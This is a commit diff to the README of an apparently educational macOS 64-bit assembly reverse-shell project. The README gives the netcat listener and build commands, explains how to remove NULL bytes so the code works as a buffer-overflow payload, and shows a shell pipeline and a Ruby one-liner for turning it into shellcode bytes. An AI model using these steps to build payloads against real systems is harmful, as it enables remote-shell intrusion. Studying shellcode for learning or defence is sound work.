reverse_shell/README.md, before:

reverse_shell
=============

#### reverse_shell, Usage:
  Program that call out to a service that is listening to port 4444, the ip is set to any for simplicity.
  It is written for mac osx 64 bit

  Start a listening server with the command: `nc -l 4444` in another folder for example your home directory
```
  nasm -g -f macho64 reverse_shell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o reverse_shell reverse_shell.o
  ./reverse_shell
```  


To use the code as a payload, one need to remove the NULL bytes, these can be found by running: otool -lV reverse_shell and identify
the mov instructions that need to be modified. The reason are the numerous NULL bytes (\x00). 
Most buffer overflow errors are related to C stdlib string functions: strcpy(), sprintf(), strcat(), 
and so on. All of these functions use the NULL symbol to indicate the end of a string. 
Therefore, a function will not read shellcode after the first occurring NULL byte.
There are other delimiters like linefeed (0x0A), carriage return (0x0D), 0xFF, and others.
See the code for two example on how to change the mov instruction

#### Binary to string
To convert the binary to string values that can be used as a payload use
```
  gobjdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g' > dump.txt
```
  By inspecting this file, we see why NULL(0x00) is a problem as in C a string is terminated by NULL so these has to be removed
  A simple `paste -d'\0' -s dump.txt` will combine all rows into one that can then be copied into the C file.
  Ànother way to find bad values is:
```
 gobjdump -D bindshell -M intel |grep 00
``` 
  A more simple command to use is the osx otool, `otool -t reverse_shell_no_bad_values.o` we test our reverse_shell code in a simple c-program.

Commit message:

added example in ruby to get the hex value for the sh command

reverse_shell/README.md, after:

reverse_shell
=============

#### reverse_shell, Usage:
  Program that call out to a service that is listening to port 4444, the ip is set to any for simplicity.
  It is written for mac osx 64 bit

  Start a listening server with the command: `nc -l 4444` in another folder for example your home directory
```
  nasm -g -f macho64 reverse_shell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o reverse_shell reverse_shell.o
  ./reverse_shell
```  


To use the code as a payload, one need to remove the NULL bytes, these can be found by running: otool -lV reverse_shell and identify
the mov instructions that need to be modified. The reason are the numerous NULL bytes (\x00). 
Most buffer overflow errors are related to C stdlib string functions: strcpy(), sprintf(), strcat(), 
and so on. All of these functions use the NULL symbol to indicate the end of a string. 
Therefore, a function will not read shellcode after the first occurring NULL byte.
There are other delimiters like linefeed (0x0A), carriage return (0x0D), 0xFF, and others.
See the code for two example on how to change the mov instruction

#### Binary to string
To convert the binary to string values that can be used as a payload use
```
  gobjdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g' > dump.txt
```
  By inspecting this file, we see why NULL(0x00) is a problem as in C a string is terminated by NULL so these has to be removed
  A simple `paste -d'\0' -s dump.txt` will combine all rows into one that can then be copied into the C file.
  Ànother way to find bad values is:
```
 gobjdump -D bindshell -M intel |grep 00
``` 
  A more simple command to use is the osx otool, `otool -t reverse_shell_no_bad_values.o` we test our reverse_shell code in a simple c-program.
  A simple command in ruby give us the hex values for `/bin//sh`´(remember that osx is little endian)
```
"/bin//sh".unpack('H*')
=> ["2f62696e2f2f7368"] and that give us the value to use as: 0x68732f2f6e69622f
```
